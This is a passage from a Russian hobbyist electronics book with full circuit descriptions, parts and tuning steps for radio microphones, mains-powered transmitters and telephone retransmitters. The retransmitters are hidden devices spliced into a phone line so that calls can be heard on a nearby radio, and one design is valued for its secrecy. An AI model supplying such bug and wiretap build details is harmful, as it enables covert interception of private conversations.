Большинство любительских радиопередатчиков выполнены по схемам с колебательным контуром в частотозадающей цепи. При этом они имеют, как правило, один высокочастотный каскад. Этот каскад выполняет одновременно роль задающего генератора и усилителя мощности. Такие схемы при своей простоте и миниатюрности готовой конструкции имеют и свои недостатки. Это большая нестабильность колебаний высокой частоты и маленькая выходная мощность.
Схема, приведенная на рис. 2.16, лишена этих недостатков, т. к. частота задающего генератора предлагаемого устройства стабилизируется кварцевым резонатором и имеет отдельный усилитель мощности. Данное устройство работает в диапазоне УKB ЧМ с частотной модуляцией, т. е. его сигнал может быть принят на любой приемник диапазона 65-108 МГц. Дальность действия составляет около 300 м.
Задающий генератор выполнен на транзисторе VT1 типа КТЗ68. В данной схеме могут быть использованы кварцевые резонаторы на частоты 22-36 МГц. Контур, состоящий из катушки L1 и конденсатора С7 настраивается на третью гармонику кварцевого резонатора.
Предпочтительнее использовать резонатор, настроенный на третью гармонику последовательного резонанса, т. к. при этом легче получить необходимую для нормальной работы приемника девиацию частоты 50 кГц. Кварцевый резонатор подключен к базе транзистора VT1 и варикапу VD1 и работает по осцилляторной схеме, составляя с емкостью С5 и контуром "емкостную трехточку", что обеспечивает высокую стабильность частоты.
Модулирующий усилитель выполнен на операционном усилителе DA1 типа КР1407УД2. На его вход поступает изкочастотный звуковой сигнал от электретного микрофона М1 со встроенным усилителем типа МКЭ-З. Операционный усилитель обеспечивает на выходе неискаженное напряжение звуковой частоты с амплитудой около 3 В, что достаточно, при использовании в качестве модулирующего элемента варикапа типа КВ104А для достижения девиации частоты около 4050 кГц. Режим работы операционного усилителя задается резисторами R1, R4, и R3. Микросхему DA1 можно заменить на К140УД1208, КР140УД608 - в последнем случае резистор R3 можно из схемы исключить. Промодулированный по частоте сигнал с контура задающего генератора L1, С7 через катушку связи L2 поступает на вход усилителя мощности, выполненного на транзисторе VT2 типа КТ610А. Усилитель мощности работает с высоким КПД в режиме класса "С". Он усиливает сигнал до 150 мВт. Поэтому при использовании вместо висячей или штыревая антенны длиной в 1 м катушки L3 диаметром З см (рис. 2.17), содержащей 7 витков провода ПЭВ 0,8, получается эффективность не хуже стандартного варианта с проводом длиной в 1 м и мощностью около ЗОмВт. Такой мощности вполне достаточно для устойчивого приема на расстоянии до 150 м. Длина намотки катушки L3 - 5 см.
В конструкции использованы резисторы МЛТ-0,125 , конденсаторы типа КТ, КД, К50-35. Дроссель Др1 намотан на резисторе МЛТ-0,25 сопротивлением более 100 ком. Он содержит 60 витков провода ПЭВ 0,1 мм. Катушки L1 и L2 намотаны на полистироловом каркасе диаметром 5 мм с латунным подстроечником. Катушка L1 (рис. 2.16) содержит 10 витков провода ПЭВ 0,31 мм, катушка L2 - 5 витков того же провода. Конструкция катушки L3 показана на рис. 2.17.
Настройка низкочастотной части передатчика особенностей не имеет. Передатчик настраивают по общепринятой методике с использованием индикатора напряженности поля и контрольного радиоприемника. Контур С7, L1 настраивают таким образом, чтобы обеспечить устойчивость генерации задающего каскада. При подключении отрезка провода длиной около 1 м к точке А антенны, предварительно отсоединив емкости С10, С11 и L3, по измерительным приборам добиваются выходной мощности передатчика около 150 мВт. Такой мощности достаточно для того, чтобы принимать сигнал на приемник с чувствительностью 5 мкВ/м на расстоянии до 500 мв городских условиях.
Радиопередатчик повышенной мощности без дополнительного усилителя мощности
От предыдущих устройств предлагаемый радиопередатчик отличается конструкцией задающего генератора, позволяющей получить повышенную мощность излучения без использования дополнительного усилителя мощности.
Радиопередатчик (рис.2.18) работает на частоте 27-28 МГц с амплитудной модуляцией. Частота несущей стабилизирована кварцем, что позволяет увеличить дальность связи при использовании приемника с кварцевой стабилизацией частоты. Питается устройство от источника питания напряжением 3-4,5 В. Усилитель звуковой частоты выполнен на транзисторе VT1 типа КТ315. Для питания микрофона и задания режимов по постоянному току транзисторов VTI, VT2, VT3 используется параметрический стабилизатор напряжения на резисторе R2, светодиоде VD1 и конденсаторе С1. Напряжение 1,2 В поступает на электретный микрофон с усилителем М1 типа МКЭ-З, "Сосна" и др. Напряжение звуковой частоты с микрофона М1 через конденсатор С2 поступает на базу транзистора VT1. Режим работы этого транзистора по постоянному току задается резистором R1. Усиленный сигнал звуковой частоты, снимаемый с коллекторной нагрузки транзистора VT1 - резистора R3, через конденсатор СЗ поступает на задающий генератор, осуществляя тем самым амплитудную модуляцию передатчика. Задающий генератор передатчика собран на двух транзисторах VT2 и VT3 типа КТЗ15 и представляет собой двухтактный автогенератор с кварцевой стабилизацией в цепи обратной связи.
Контур, состоящий из катушки L1 и конденсатора С5, настроен на частоту кварцевого резонатора ZQ1. Контур, состоящий из катушки L2 и конденсатора С7, предназначен для согласования антенны и передатчика.
В устройстве применены резисторы МЛТ-0,125. Конденсаторы использованы на напряжение более 6,3 В. Транзистор VT1 можно заменить на любой n-p-n транзистор, например, на КТ3102, КТ312. Транзисторы VT2, VT3 можно заменить на КТ3102, КТ368 с одинаковым коэффициентом передачи по току. Хороший результат можно получить при использовании микросхемы КР159НТ1, представляющей собой пару идентичных транзисторов.
Контурные катушки намотаны на каркасе диаметром 5 мм, имеющем подстроечный сердечник из карбонильного железа диаметром 3,5 мм. Намотка катушек ведется с шагом 1 мм. Катушка L1 имеет 4+4 витка, катушка L2 - 4 витка. Обе катушки намотаны проводом ПЭВ 0,5. Дроссель Др1 имеет индуктивность 20-50 мкГн. В качестве антенны используется провод длиной около 1 м.
В качестве источника питания можно использовать одну плоскую батарею КБС-4,5 В или четыре элемента-типа А316, А336, А343.
Светодиод VD1 типа АЛЗ07 можно заменить любым другим или использовать аналог низковольтного стабилитрона с малым током стабилизации (рис. 2.19).
Настройку передатчика начинают с установки режимов транзисторов VT2 и VT3 по постоянному току. Для этого подключают миллиамперметр в разрыв цепи питания в точке А и подбирают величину сопротивления резистора R4 такой, чтобы ток был равен 40 мА.
Настройку контуров L1, L2, С5, С7 проводят по максимуму ВЧ излучения. Причем грубо на рабочую частоту настраивают конденсаторами, а точнее - сердечником катушки. Подстроечник катушек L1, L2 должен находиться на расстоянии не более чем 3 мм от центра катушек, т. к, в крайних его положениях генерация может срываться из-за нарушения симметрии плеч транзисторов VT2, VT3.
2.1.7. Радиомикрофоны большой мощности с повышенной стабильностью частоты
Радиопередатчик с фиксированной частотой задающего генератора
Передатчик работает на фиксированной частоте, определяемой частотой кварцевого резонатора в его задающем генераторе.
Характеристики передающего тракта:
Принципиальная схема передатчика показана на рис. 2.20.
В данной схеме используется модулирующий усилитель с электретным микpофоном со встpоенныс усилителем. С целью повышения pазбоpчивости речи применяется частотная и амплитудная коррекция низкочастотного сигнала. Сигнал от микрофона поступает на неинвертирующий вход операционного усилителя DA1. В данной схеме используется однополярное питание. Для того чтобы операционный усилитель мог работать, на этот его вход поступает напряжение смещения, равное половине напряжения питания, создавая среднюю точку двуполярного источника. Напряжение задается резисторами R1, R2, R3.
В цепи обратной связи операционного усилителя включена комбинированная цепь связи по постоянному току. При слабом и нормальном сигнале от микрофона напряжение на выходе операционного усилителя невелико, и диоды VD1 и VD2 закрыты. При превышении выходным сигналом определенного уровня диоды открываются, что приводит к включению в обратной связи дополнительного резистора R5. Коэффициент ООС увеличивается и коэффициент передачи ОУ уменьшается. Таким образом работает компрессор, корректирующий входной сигнал по амплитуде. Кроме того, в цепи ООС включены частотно-зависимые цепи на элементах R6-R8 и С5-С7, которые превращают модуляционный усилитель в активный фильтр и выделяют полосу частот от 450 Гц до 2500 Гц, отфильтровывая нежелательные помехи по низкой и высокой частоте.
С выхода операционного усилителя через фильтрующую цепочку на резисторах R9 и R10 напряжение звуковой частоты поступает на варикапы VD3 и VD4. Напряжение на варикапах изменяется в соответствии с сигналом звуковой частоты, изменяя их емкость.
Варикапы включены последовательно в емкостной делитель в цепи обратной связи кварцевого генератора, и, следовательно, при его возбуждении частота генератора будет изменяться в соответствии с изменением амплитуды звукового сигнала. Задающий генератор выполнен на транзисторе VT1. Кварцевый резонатор включен в цепь базы транзистора и возбуждается на частоте последовательного резонанса.
В данном случае используется резонатор с основной частотой возбуждения 24, 28 МГц. В коллекторном контуре транзистора VT1 выделяется утроенное значение частоты - 72, 84 МГц. Контур L1, С15 настроен на третью гармонику резонатора. С катушкой этого контура индуктивно связан вход парафазного балансного удвоителя частоты, работающего на четных гармониках. Удвоитель выполнен на транзисторах VT2 и VT3, коллекторы которых соединены вместе, а базы подключены к включенным противофазно катушкам L2.1 и L2.2.
Полосовой фильтр на элементах L4, С17 и L3, С19 на выходе удвоителя выделяет напряжение частотой 145,68 МГц, которое с части витков катушки L3 поступает на вход предварительного каскада усилителя мощности на транзисторе VT4. Он работает в режиме А-В с небольшим напряжением смещения, получаемым от параметрического стабилизатора напряжения, выполненного на кремниевом диоде VD7, включенном в прямом направлении (по схеме стабистора). Усиленное напряжение выделяется в коллекторной цепи VT4 и через С25 поступает в антенну. Антенной передатчика служит четвертьволновый вибратор с эквивалентным сопротивлением 75 Ом.
Конденсаторы постоянной емкости могут быть любые типа КМ и КЛ, КТ. В контурах нужно устанавливать конденсаторы с минимальным ТКЕ. Электролитические конденсаторы типа К53-14, но можно использовать и К50-35, и другие малогабаритные. Операционный усилитель можно заменить на К140УД708, К140УД6, КР140УД2, К140УД7, К140УД8 или К140УД12. Вместо транзистора КТ315 можно использовать любой с граничной частотой не менее 300 МГц, например, КТ312, КТ316 или КТ368. Транзистор выходного каскада передатчика КТ610 можно заменить на КТ913, КТ925.
Для катушек индуктивности L1 и L2 передатчика использованы пластмассовые каркасы диаметром 5мм, предназначенные для вертикальной установки (на одном торце имеется прямоугольная площадка для пяти выводов). Каркас имеет подстроечный сердечник из феррита 20ВЧ. При отсутствии такого сердечника можно от него отказаться, и параллельно конденсатору С15 со стороны монтажа припаять подстроечный керамический конденсатор. Катушка L1 имеет 10 витков, L2 - 6-1-6 витков. Использован провод ПЭВ-2 0,31.
Остальные катушки передатчика бескаркасные, они наматываются на оправках, которые затем удаляются. Диаметр всех катушек 5 мм, L3 содержит 1.5+3.5 витков, L4 - 5 витков. Все катушки намотаны проводом ПЭВ-2 1,0 мм. Длина намотки катушек L3 и L5 - 8 мм, L4 - 9 мм. Более точно размеры катушек устанавливаются при настройке.
Настройку передатчика после проверки правильности монтажа начинают с настройки контуров при помощи резонансного волномера. В начале перемещением сердечника L1 добиваются максимальной амплитуды напряжения с частотой 72-73 МГц в контуре L1, С15. Затем последовательно настраивают контуры L4, С17 и L3, С19 по максимуму напряжения 144-146 МГц. Дополнительно при настройке контуров нужно подобрать номинал R12 таким образом, чтобы имелось максимальное выходное напряжение передатчика. Утроитель на VT2 и VT3 балансируют переменным резистором R15 по максимальному подавлению напряжения 72-73 МГц на его выходе. Настройка низкочастотного тракта передатчика сводится только к проверке работоспособности. В небольших пределах частоту несущей передатчика можно изменять подстройкой С9.
Радиопередатчик большой мощности с кварцевой стабилизацией частоты
Рассмотрим схему еще одного радиопередатчика с кварцевой стабилизацией частоты задающего генератора. Принципиальная схема передающего тракта изображена на рис. 2.21.
Основные технические характеристики радиопередатчика следующие:
Сигнал от конденсаторного микрофона со встроенным усилителем (М1) поступает на прямой вход операционного усилителя DA1. К этому входу подключен делитель напряжения на резисторах R2 и R3, который создает половину напряжения питания на этом входе, и таким образом позволяет ОУ работать с однополярным питанием.
Между инвертирующим входом п выходом включена цепь R7, С5, С6, которая создает нужный коэффициент усиления и частотную характеристику усилителя. Этот усилитель работает как компрессор речевого сигнала, сжимая его динамический диапазон за счет каскада на транзисторе VT1. Выходное напряжение ЗЧ усилителя детектируется диодами VD1 и VD2 в постоянное напряжение, отрицательное, которое воздействует на затвор транзистора VT1 и с увеличением уровня звукового сигнала увеличивает сопротивление канала этого транзистора.
В результате шунтирования инвертирующего входа конденсатором С6 изменяется коэффициент отрицательной обратной связи, что приводит к изменению коэффициента усиления ОУ. Выходное напряжение ОУ, равное половине напряжения питания, поступает через резисторы R1 и R12 на катоды варикапов VD3. Модулирующее напряжение ЗЧ изменяется на катоде варикапов относительно этого напряжения смещения.
Варикапная матрица VD3 включена между кварцевым резонатором и общим проводом. Изменение емкости варикапа приводит к некоторому изменению частоты резонатора. В этом процессе играет роль и индуктивность катушки L1.
На транзисторе VT2 выполнен задающий генератор, частота в коллекторном контуре которого определяется включенным резонатором, индуктивностью L1 и емкостью VD3. Контур L2, С13 в коллекторной цепи этого транзистора настроен на середину выбранного диапазона, и на нем выделяется частотно-модулированное напряжение ВЧ с частотой резонатора Q1. Это напряжение через катушку связи L3 поступает на выходной каскад, выполненный на транзисторе VT3. Катушка включена в цепь смещения базы этого транзистора - К17, К18, которая создает рабочую точку выходного каскада. Усиленное и модулированное по частоте напряжение ВЧ выделяется на коллекторе VT3. Затем через ФНЧ и удлинительную катушку это напряжение поступает в антенну. ФНЧ на катушке и и конденсаторах С16 и С17 служит для подавления гармоник и согласования выходного сопротивления каскада на транзисторе VT3 с входным сопротивлением антенны, катушка L5 вводит дополнительную индуктивность в цепь антенны и таким образом увеличивает ее эквивалентную длину, приближая к четвертьволновой. В результате отдача сигнала в антенну увеличивается. Конденсатор С19 исключает выход из строя транзистора VT3 от случайного замыкания антенны с общим проводом или цепью питания.
Все высокочастотные катушки передатчика выполнены на одинаковых каркасах диаметром 7 мм с сердечниками из феррита 100 ВЧ диаметром 2,8 мм. Катушка передатчика L2 имеет 6 витков, L3 - 3 витка, и - 8 витков, L5 - 20 витков провода ПЭВ 0,2. Катушка L1 - дроссель ДМ-0,06 16 мкГн. Настройку передатчика производят традиционным способом, контролируя вырабатываемую им напряженность поля при помощи волномера или ВЧ осциллографа с проволочной рамкой на входе.
2.1.8. Радиопередатчик с питанием от сети 220 В
Радиопередатчик с AM в диапазоне частот 27-30 МГц
Устройство, описанное ниже, работает в диапазоне 27-30 МГц с амплитудной модуляцией несущей частоты. Основное достоинство заключается в том, что оно питается от электросети. Эту же сеть оно использует для излучения сигнала высокой частоты. Приемник принимает сигнал, используя телескопическую антенну или специальный сетевой адаптер. Схема радиопередатчика приведена на рис. 2.22.
Задающий генератор собран на транзисторе VT2 типа КТ315 по традиционной схеме. Для питания микрофона М1 применен параметрический стабилизатор напряжения, собранный на резисторе R1 и светодиоде VD1, включенном в прямом направлении, на аноде которого поддерживается напряжение 1,2-1,4 В. На транзисторе VT1 типа КТЗ15 собран УЗЧ, сигнал с которого модулирует по амплитуде задающий генератор. Постоянное напряжение на коллекторе транзистора VT1 является напряжением смещения для транзистора VT2. Промодулированный ВЧ сигнал с катушки связи L2 через конденсатор С9 поступает в электросеть. В данном случае провода электросети выполняют роль антенны. Источник питания собран по бестрансформаторной схеме. Дроссель Др1 предотвращает проникновение ВЧ колебаний в источник питания. На реактивном сопротивлении конденсатора С8 гасится излишек сетевого напряжения. В отличие от резистора, конденсатор не нагревается и не выделяет тепло, что благоприятно сказывается на режиме работы устройства. Выпрямитель собран на диодах VD3, VD4. Конденсатор С7 сглаживает пульсации выпрямленного напряжения. Далее напряжение через параметрический стабилизатор, собранный на резисторе R5 и стабилитроне VD2, поступает для питания радиомикрофона.
Конденсатор С6 уменьшает пульсации выпрямленного напряжения. Такой блок питания обеспечивает стабильную работу радиомикрофона при изменениях сетевого напряжения в интервале от 80 до 260 В. Микрофон М1 - любой малогабаритный конденсаторный микрофон со встроенным усилителем ( МКЭ-З , М1-Б, "Сосна" и др.). Конденсаторы С8 и С9 должны быть рассчитаны на рабочее напряжение не менее 250 В. Дроссель Др1 типа ДПМ-0,1 номиналом 50-90 мкГн. Дроссель Др1 может быть изготовлен самостоятельно. Он содержит 100-150 витков провода ПЭВ 0,1 мм на стандартном ферритовом сердечнике диаметром 2,8 мм и длиной 14 мм (длина сердечника может быть уменьшена в 2 раза). Катушки L1 и L2 намотаны на стандартных ферритовых стержнях диаметром 2,8 мм и длинной 14 мм проводом ПЭВ 0,23. Катушка L1 - 14 витков, L2 - 3 витка поверх и.
Транзистор VT2 может быть заменен на КТЗ102 или КТЗ68. Светодиод VD1 - на любой светодиод. Диоды VD3, VD4 заменяются на КД105 нли другие на напряжение не ниже 300 В. Конденсаторы С6 и С7 могут быть большей емкости и на большее рабочее напряжение, они должны иметь минимальную утечку. Стабилитрон VD1 может быть заменен на любой стабилитрон с напряжением стабилизации 8-12 В.
Схема сетевого адаптера представлена на рис. 2.23.
Конденсатор С1 исключает проникновение напряжения сети в катушку L1 и на вход используемого приемника. Катушки L2, L3, L4 и конденсаторы С2, СЗ, С4 образуют двухконтурный ФСС. С катушки L4 отфильтрованный сигнал поступает на вход приемника.
Катушки L1, L2, L3, L4 намотаны на каркасах от КБ катушек переносных радиоприемников. Катушка L1 имеет 2 витка, L2 - 14 витков, L3 - 14 витков, L4 - 5 витков. Все катушки намотаны проводом ПЭВ 0,23. Конденсатор С1 - на напряжение не ниже 250В, конденсаторы С2 и С4 - подстроечные.
Настройку устройства следует начинать с проверки напряжения питания. Для этого необходимо сделать разрыв в точке А. Напряжение на конденсаторе С6 должно быть 9 В. Если напряжение отличается от указанного, следует проверить исправность элементов блока питания Др1, С8, VD3, VD4, С7, К5, VD2, С6.
При исправном блоке питания следует восстановить соединение и точке А и подбором сопротивления резистора R2 установить напряжение на базе транзистора VT2 равным 3,5 В. Дальнейшая настройка сводится к установке несущей частоты подстройкой контура перемещением сердечника катушек L1, L2. Настроенную схему нужно залить эпоксидной смолой, предварительно отгородив микрофон.
Настройка адаптера сводится к настройке контуров L2, С2 и L3, С4 на частоту передатчика.
ВНИМАНИЕ! При настройке и эксплуатации устройств с бестрансформаторным питанием от сети переменного тока необходимо соблюдать правила и меры безопасности, т. к, элементы устройств находятся под напряжением 220 В.
Радиопередатчик с ЧМ в диапазоне частот 1-30 МГц
Устройство, описанное ниже, может работать в диапазоне 1-30 МГц с частотной модуляцией. Для питания радиопередатчика используется электросеть 220 В. Эта же сеть используется устройством в качестве антенны. Схема радиопередатчика приведена на рис. 2.24.
Блок питания устройства собран по бестрансформаторной схеме. Напряжение сети 220 В поступает на дроссели Др1, Др2 и гасящий конденсатор С2, на котором гасится излишек напряжения. Переменное напряжение выпрямляется мостом VD1, нагрузкой которого является стабилитрон VD2 типа КС510. Пульсации напряжения сглаживаются конденсатором С3.
Модулирующий усилитель выполнен на транзисторе VT1 типа КТ315. Сигнал звуковой частоты поступает на базу этого транзистора с электретного микрофона с усилителем М1 типа МКЭ-3 или М1-Б2 "Сосна". Усиленное напряжение звуковой частоты через резистор R2 поступает на варикап VD3 типа KB109A, изменение емкости которого позволяет осуществлять частотную модуляцию.
Задающий генератор выполнен по схеме индуктивной трехточки на транзисторе VT2 типа КТЗ15. Частота генератора определяется элементами колебательного контура L1, С5, С4, VD3. Обратная связь осуществляется через конденсатор С7.
Режимы транзисторов VT1 и VT2 по постоянному току регулируются резисторами К5 и R4 соответственно. Напряжения смещения транзисторов VT1 и VT2 формируются этими резисторами и параметрическим стабилизатором, выполненным на резисторе R3, светодиоде VD4 типа АЛ307 и конденсаторе С8. Этим достигается более высокая стабильность частоты, чем при обычном включении.
Напряжение высокой частоты, промодулированное по частоте звуковым сигналом, с катушки связи L2 поступает в сеть 220 В через разделительный конденсатор С1. Конденсатор С1 уменьшает влияние напряжения сети на задающий генератор. Дроссели Др1 и Др2 исключают проникновение напряжения высокой частоты по цепям питания.
Дроссели Др1 и Др2 намотаны на ферритовых стержнях и содержат по 100 витков провода ПЭВ 0,1 мм каждый. Катушки L1 и L2 намотаны на каркасе диаметром 5 мм с подстроечным сердечником. Для диапазона 27 МГц катушка L1 имеет 10 витков с отводом от середины, намотанных проводом ПЭВ 0,3 мм. Катушка связи L2 имеет 2 витка того же провода.
Конденсаторы С1 и С2 должны быть рассчитаны на рабочее напряжение не ниже 250 В. Диодная сборка КЦ407 может быть заменена на четыре диода КД105, КД102. Вместо стабилитрона VD2 можно использовать любой другой с напряжением стабилизации 8-12 В. Светодиод VD4 типа АЛ307 можно заменить на любой светодиод или на два-три кремниевых диода, включенных в прямом направлении. При использовании кондиционных деталей и правильном монтаже настройка заключается в подстройке частоты задающего генератора конденсатором С5.
ВНИМАНИЕ! При настройке и эксплуатации устройств с бестрансформаторным питанием от сети переменного тока необходимо соблюдать правила и меры безопасности, т. к, элементы этих устройств находятся под напряжением 220В.
Сетевой низкочастотный радиопередатчик
Вышеприведенные устройства излучают высокочастотные колебания в сеть, используя провода сети в качестве антенны. Но есть и устройства, которые работают в низкочастотном диапазоне (50-300 кГц) и также использующие в качестве канала связи - электросеть или телефонную линию. Такие радиопередатчики имеют повышенную скрытность, так как практически не излучают сигналы в окружающее пространство. Примером передачи сигналов в низкочастотном диапазоне может служить трехпрограммное проводное вещание, где 2 и 3 программы передаются на частотах 78 кГц и 120 кГц соответственно с использованием амплитудной модуляции. Приборы, питающиеся от сети переменного тока, могут длительное время передавать по ней информацию в любую точку здания и даже за его пределы.
Схема одного из таких устройств приведена на рис. 2.25.
Для передачи информации используется частотная модуляция и несущая частота, равная 95 кГц. Устройство питается от сети через бестрансформаторный блок питания. Излишек напряжения сети гасится конденсатором С1. Пониженное напряжение выпрямляется диодным мостом VD1 типа КЦ407. Резистор RЗ и конденсатор С4 образуют сглаживающий фильтр, предотвращающий проникновение колебаний несущей частоты в цепи питания устройства. Напряжение ограничивается до необходимой величины стабилитроном VD2 типа КС520. Данное напряжение используется для питания усилителя мощности. Напряжение, снимаемое с параметрического стабилизатора на резисторе R6, стабилитроне VD3 и конденсаторе С7, используется для питания устройства.
Сигнал звуковой частоты, снимаемый с микрофона М1 типа М1-Б2 "Сосна", усиливается однокаскадным усилителем на транзисторе VT2 типа КТ315.
ЧМ модулятор представляет собой управляемый напряжением генератор прямоугольных импульсов. Собран он на микросхеме DD1 типа К561ЛА7. Начальную (при отсутствии напряжения звуковой частоты) частоту следования импульсов генератора устанавливают равной 95 кГц при помощи подстроечного резистора R10. При поступлении напряжения ЗЧ с делителя R9, R10 частота следования импульсов генератора начинает изменяться, т. е. модулируется напряжением ЗЧ. Модулированные колебания поступают на усилитель мощности, собранный на транзисторе VT1 типа КТ315. Нагрузкой этого транзистора служит трансформатор Т1. Первичная обмотка трансформатора совместно с конденсатором С2 образуют колебательный контур, настроенный на частоту несущей. В этом колебательном контуре прямоугольные импульсы преобразуются в синусоидальный сигнал, что исключает появление побочных гармоник в выходном сигнале. С обмотки 2 трансформатора Т1 сигнал несущей частоты через конденсаторы С1 и С3 поступает в сеть 220 В переменного тока. Такой сигнал необходимо принимать на специальный приемник (см. далее).
В устройстве использованы резисторы типа МЛТ-0,125. Резистор R10 любой малогабаритный. Конденсаторы С1 и СЗ должны быть рассчитаны на рабочее напряжение не ниже 250 В. Стабилитроны VD2 и VD3 могут иметь напряжение стабилизации 18-24 В и 6-12 В, соответственно. Микросхема DD1 может быть заменена на К176ЛА7, К564ЛА7, К1561ЛА7.
Трансформатор Т1 намотан на кольцевом ферритовом сердечнике К12х7хЗ мм марки 600НН. Первичная обмотка содержит 100 витков провода ПЭВ 0,1, вторичная обмотка - 20 витков провода в изоляции диаметром 0,15-0,3 мм. Сердечник трансформатора изолируется лакотканью или фторопластом. Обмотки также разделяются слоем изоляции.
Настройку лучше начинать с использованием источника постоянного напряжения 30 В, плюсовой провод которого подключают к точке А (устройство к сети не подключено!). Проверяют напряжение на стабилитронах VD2 и VD3. Затем закорачивают базу транзистора VT2 на общий провод и подбором сопротивления резистора R10 устанавливают частоту генератора на микросхеме DD1 равной 95 кГц (контролируется осциллографом или частотомером на резисторе R2).
Подбором конденсатора С2 добиваются получения неискаженной синусоиды на коллекторе транзистора VT1. После этого снимают перемычку с базы транзистора VT2 и убеждаются в наличии частотной модуляции.
ВНИМАНИЕ! При настройке и эксплуатации устройств с бестрансформаторным питанием от сети переменного тока необходимо соблюдать правила и меры безопасности, т. к, элементы этих устройств находятся под напряжением 220 В.
2.2. Телефонные ретрансляторы
Телефонный радиоретранслятор с AM в диапазоне частот 27-28 МГц
Устройство, схема которого приведена ниже, представляет собой телефонный радиоретранслятор. Последний позволяет прослушивать телефонный разговор на радиоприемник диапазона 27-28 МГц с амплитуднои модуляцией. Принципиальная схема этого устройства изображена на рис. 2.26.
Устройство представляет собой маломощный однокаскадный передатчик с амплитудной модуляцией и кварцевой стабилизацией несущей частоты.
Задающий генератор выполнен по традиционной схеме на транзисторе VT1 типа КТЗ15. Режим транзистора по постоянному току задается резисторами R2 и R3. Кварцевый резонатор ZQ1 включен между коллектором и базой транзистора VT1. Он может быть любым, на одну из частот диапазона 27-28 МГц. Контур, состоящий из катушки L2 и конденсатора СЗ, настроен на частоту кварцевого резонатора. С катушки связи L1 сигнал поступает в антенну, в качестве которой используются телефонные провода.
Дроссель Др1 служит для разделения высокочастотного и низкочастотного сигналов. Диод VD1 предохраняет устройство от выхода из строя в случае неправильного подключения. Схема подключения устройства представлена на рис. 2.27.
Передатчик подключается параллельно телефонной трубке. Когда трубка положена на рычаг, разговорный узел отключен от линии. Подключена к линии в этот момент только цепь вызывного устройства. Таким образом, до тех пор пока трубка не снята, напряжение питания на передатчик не поступает. Как только трубку снимают, к линии подключается разговорная часть. Во время разговора ток через разговорную часть меняется синхронно с речью, соответственно изменяется и напряжение в точках +Л1 и -Л1.
Изменение напряжения питания приводит к соответствующему изменению амплитуды генерируемых высокочастотных колебаний, т. е. имеет место амплитудная модуляция. В результате разговор можно слушать на расстоянии до 50 м на приемник диапазона 27-28 МГц, работающий на прием AM сигнала.
Транзистор VT1 может быть типа КТ316, КТ3102, КТ368. Диод VD1 - КД521, КД510, Д220. Дроссель Др.1 намотан на ферритовом стержне марки 600НН диаметром 2.8 мм и длиной 14 мм, он содержит 150-200 витков провода ПЭВ 0,1 мм.
Катушки L1 и L2 намотаны на полистироловом каркасе от KB приемников диаметром 8 мм с надстроечным сердечником. Катушка L2 содержит 12 витков провода ПЭВ 0,31. Катушка связи L1 наматываетя поверх катушки L2 и содержит 3 витка того же провода.
Настройка устройства осуществляется путем настройки контура L2, СЗ на несущую частоту. При подключении следует учитывать полярность напряжения линии.
Телефонный ретранслятор УКВ диапазона с ЧМ
Устройство, описанное ниже, имеет сходство с предыдущим по способу подсоединения к телефонной линии. Устройство представляет собой маломощный передатчик, работающий в диапазоне УКВ ЧМ с использованием частотной модуляции. Дальность действия передатчика около 100 м. Принципиальная схема устройства представлена на рис. 2.28.
Особенность схемы состоит в том, что передатчик, собранный на транзисторе VT1 типа КТЗ15, питается от телефонной линии, используя ее в качестве антенны, а частотная модуляция осуществляется путем изменения емкостей переходов этого транзистора при изменении питающего напряжения.
Задающий генератор выполнен на транзисторе VT1 по схеме с общей базой. Напряжение обратной связи поступает на его эмиттер с делителя, состоящего из конденсаторов С2 и С3. Частоту задающего генератора определяют конденсаторы С2, С3, катушка L1 и межэлектродные емкости транзистора VT1. С коллектора транзистора VT1 сигнал через конденсатор С1 поступает в линию, провод которой используется в качестве антенны. Дроссель Др1 служит для разделения ВЧ и НЧ составляющих сигналов.
Подключение данного устройства к линии аналогично подключению устройства, описанного выше (см. рис. 2.27).
Катушка L1 бескаркасная, диаметром 4 мм, содержит 6-7 витков провода ПЭВ 0,3. Дроссель Др1 индуктивностью не менее 30 мкГн типа ДПМ 0.1.
Настройка передатчика заключается в подборе сопротивления резисторов R2 или R3 для получения максимального излучения. Контур передатчика настраивают растяжением или сжатием витков катушки L1 на свободный участок УКВ ЧМ диапазона.
Телефонный ретранслятор с питанием от телефонной линии
Устройство, схема которого представлена ниже, представляет собой УКВ ЧМ передатчик в радиовещательном диапазоне частот. Питается оно от телефонной линии и имеет выходную мощность около 20 мВт. Основное отличие этого устройства от описанных выше заключается в способе подсоединения к телефонной линии. В данном случае устройство подключается в разрыв одного из проводов линии в любом месте по всей длине кабеля. Принципиальная схема радиоретранслятора представлена на рис. 2.29.
Резистор R1 включается в разрыв одного из проводов телефонной сети. При снятии трубки телефонного аппарата в цепи появляется ток, который, в зависимости от типа аппарата и состояния линии, находится в пределах 10-35 мА. Этот ток, протекая через резистор R1, вызывает на нем падение напряжения порядка 4-25 В. Напряжение поступает на выпрямительную диодную сборку типа КЦ407, благодаря которой устройство может подключаться в линию без соблюдения полярности. Высокочастотная часть схемы запитывается от параметрического стабилизатора, собранного на резисторе R3, стабилитроне VD3 типа КС191 и конденсаторе С7. Стабилизатор ограничивает излишек напряжения, поступающего с диодной сборки VD1.
Задающий генератор выполнен на транзисторе VT1 типа КТ315. Работа такого генератора подробно была описана в разделе 2.2. Частотная модуляция осуществляется путем изменения емкости варикапа VD2 типа КВ109А. Модулирующее напряжение поступает из линии через последовательно включенные резистор R2 и конденсатор С1. Первый ограничивает уровень низкочастотного сигнала, второй - исключает проникновение постоянного напряжения линии в цепь модулятора.
Частотно-модулированный сигнал с катушки связи L2 поступает в антенну, в качестве которой используется отрезок монтажного провода длиной, равной четверти длины волны, на которой работает передатчик.
Транзистор VT1 можно заменить на КТ3102, КТ368. Диодную сборку VD1 можно заменить на четыре диода КД102 или КД103. Стабилитрон VD3 можно использовать любой с напряжением стабилизации 6,8-10 В. Конденсатор С7 должен быть рассчитан на рабочее напряжение, большее напряжения стабилизации VD3. Катушка L1 намотана на корпусе подстроечного конденсатора С5 и содержит 7 витков провода ПЭВ 0,31 мм. Катушка L2 намотана поверх катушки L1 тем же проводом - 2 витка.
При настройке конденсаторы С3 и С5 подстраивают так, чтобы в нужном диапазоне (65-108 МГц) передавался сигнал максимально возможной мощности. Дальность действия собранного радиоретранслятора в зависимости от условий приема составляет 30-150 м.
Телефонный радиоретранслятор с ЧМ на одном транзисторе
